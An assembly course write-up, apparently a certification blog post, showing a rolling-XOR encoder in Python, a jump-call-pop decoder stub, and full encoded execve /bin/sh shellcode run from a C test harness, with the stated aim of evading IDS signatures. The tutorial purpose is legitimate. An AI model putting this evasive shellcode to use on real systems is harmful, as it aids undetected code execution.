Assembly Language and Shellcoding on Linux - Part 5 (Assignment 4)

Custom Encoding Schemes

Assignment 4

For this assignment we were given the following tasks:

  • Create a custom Shellcode encoder
  • Encode a stack based execve shell using the custom encoder
Why use an encoder?

Most shellcode will be picked up by firewalls/ids systems based on it's signature. By using an encoder we can hope to evade detection by changing the signature of our shellcode.
A trade off from this is that the size of our shellcode will increase as we will need the decoding function to be sent too.

Overview

In order to encode our shellcode we are going to use XOR encoding. We could just use the same byte to encode the shellcode but for this post I'm going to do a rolling XOR. This is I'm going to take the output of the first bytes XOR as the input for the second byte, then that output as the input for the third etc etc.

XOR

The truth table of A XOR B shows that it outputs true whenever the inputs differ:

XOR Truth Table

InputOutput
AB=
000
011
101
110

Let's have a look at the relationships of XOR (^) on a byte, we will XOR 0x90 with 0x41

0x90 ^ 0x41
0x9010010000
0x4110000001
Result (0xd1)00010001

Let's see what happens if we use our output (0xd1) and XOR that with 0x90

0x90 ^ 0xd1
0x9010010000
0xd100010001
Result (0x41)10000001

This mean that:
A ^ B = C
B ^ C = A
C ^ A = B

This also means that as long as we know our key byte to XOR our encoded byte with, we will end up with our original byte.

Rolling XOR

As stated at the start of the assignment we will be using a rolling XOR to encode our shellcode. We will take an initial seed byte to use to encode the first byte and use the output byte as the key for our next byte.
Here is a visual representation of what we are trying to accomplish:

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
Python Rolling XOR Encoder

In order to get our shellcode encoded we will create a python script to do this for us and provide the output that we can paste into our assembly.

#!/usr/bin/python

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

out = []  
out.append(0x90)

for i in range(0, len(shellcode)):  
    b1 = ord(shellcode[i]) ^ out[i]
    out.append(b1)

print("\nOut Length: ")  
print(str(len(out)-1))  
print(", ".join(hex(c) for c in out[1::]))  

Let's break this code down a bit to see what we are doing.
First we create a variable to hold our shellcode:

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"  

Next we need to create an array to hold our output bytes. We also place our seed byte as the first item in the output byte array:

out = []  
out.append(0x90)  

Next we XOR each byte in our shellcode with the corresponding byte in the output array. (After we have XOR'd the first byte the second will have been added to our out array ready for the next iteration). We use ord to change the char to an int for the xor operation.

for i in range(0, len(shellcode)):  
    b1 = ord(shellcode[i]) ^ out[i]
    out.append(b1)

We then do some output to the user to show the length of the encoded shellcode (we will need this later) and also format the out array to a friendly string that we can just paste directly into our assembly.

print("\nOut Length: ")  
print(str(len(out)-1))  
print(", ".join(hex(c) for c in out[1::]))  

That's it! Running the code gives us the following output:

Out Length:  
25  
0xa1, 0x61, 0x31, 0x59, 0x76, 0x59, 0x2a, 0x42, 0x2a, 0x5, 0x67, 0xe, 0x60, 0xe9, 0xa, 0x5a, 0xd3, 0x31, 0x62, 0xeb, 0xa, 0xba, 0xb1, 0x7c, 0xfc  

The Assembly

OK we've got our encoded shellcode, we now need to create our assembly that will decode it and then run it.

Jump Call Pop

In our assembly we will have our shellcode, but we don't know what address that will be at.
In order to get the address of our encoded shellcode we will use the 'Jump Call Pop' technique. This technique works as follows:

  • We short jump to location just above our shellcode
  • Call a function where our decoder will start
  • After the call esp is set to the next address just after the call instruction (our shellcode)

That might sound a little confusing so I'll show you what's happening by stepping through it with gdb-peda.

Firstly we will use some example code:

global _start

section .text  
_start:  
    jmp short call_decoder

decoder:  
    pop esi

call_decoder:  
    call decoder
    Shellcode: db "Our Shellcode will be at this address"

We compile and link that then run gdb setting the disassembly-flavor to intel and setting a break on start and then run to our breakpoint:
Highlighted in light green you can see our next instruction is the short jump to call
decoder.

jmp        0x8048083 <call_decoder>  

Notice ESP is pointing to the top of the stack.
Let's step on an instruction:
Here we see that our next instruction is to call the decoder function

call    0x8048082 <decoder>  

Notice ESP is still at the same position
Next instruction:
We've gone into our decoder function and here we can see that ESP is pointing to the top of the stack and that value is the address of the start of our shellcode 0x8048088
So we can simply pop that address out and store it in esi for use later.

The Decoder

Now we have access to the address of our shellcode let's work out the process to actually decode and run it.
What we will do is basically reverse the process that we created in our python script.

  • Take the first byte of our shellcode
  • XOR it with our seed byte (0x90)
  • Save the first byte value as our next XOR key
  • Overwrite the first byte in the shellcode with the result of the XOR
  • Loop until the end of our shellcode
  • Pass execution to the address of the start of our shellcode

Here's how it looks in assembly:

global _start

section .text  
_start:

    jmp short call_decoder

decoder:  
    pop esi        ; Store our Shellcode start address
    mov cl, 25  ; Set our counter (shellcode is 25 bytes long)
    xor eax, eax    ; Zero eax
    cdq     ; Zero edx
    mov al, 0x90    ; Move 0x90 (XOR Seed) into eax
decode:  
    mov dl, [esi]   ; Move byte at esi into edx
    xor al, dl  ; XOR eax and edx
    mov [esi], al   ; Overwrite the encoded shellcode with the decoded result
    mov al, dl  ; Move the original byte into eax to use as the key next
    inc esi     ; Increment esi
    loop decode    ; Loop until ecx is 0 (25 times)

    jmp short Shellcode ; Pass execution to the decoded shellcode

call_decoder:  
        call decoder
        Shellcode: db 0xa1, 0x61, 0x31, 0x59, 0x76, 0x59, 0x2a, 0x42, 0x2a, 0x5, 0x67, 0xe, 0x60, 0xe9, 0xa, 0x5a, 0xd3, 0x31, 0x62, 0xeb, 0xa, 0xba, 0xb1, 0x7c, 0xfc

We can't test this code by just by compiling and linking it so we will throw the objdump hex output into our c test harness:

$ for i in `objdump -D encoder | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done

\xeb\x15\x5e\xb1\x19\x31\xc0\x99\xb0\x90\x8a\x16\x30\xd0\x88\x06\x88\xd0\x46\xe2\xf5\xeb\x05\xe8\xe6\xff\xff\xff\xa1\x61\x31\x59\x76\x59\x2a\x42\x2a\x05\x67\x0e\x60\xe9\x0a\x5a\xd3\x31\x62\xeb\x0a\xba\xb1\x7c\xfc
#include<stdio.h>
#include<string.h>

unsigned char code[] = \  
"\xeb\x15\x5e\xb1\x19\x31\xc0\x99\xb0\x90\x8a\x16\x30\xd0\x88\x06\x88\xd0\x46\xe2\xf5\xeb\x05\xe8\xe6\xff\xff\xff\xa1\x61\x31\x59\x76\x59\x2a\x42\x2a\x05\x67\x0e\x60\xe9\x0a\x5a\xd3\x31\x62\xeb\x0a\xba\xb1\x7c\xfc";

main()  
{

    printf("Shellcode Length:  %d\n", strlen(code));

    int (*ret)() = (int(*)())code;

    ret();

}

Compile the C code:

$ gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode  

Testing gives us our result:

$ ./shellcode
Shellcode Length:  53  
$ whoami
root  

So our decoder is working and our execve bin/sh is running.

Full code is available on my github page:
https://github.com/DeathsPirate/SLAE/


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-734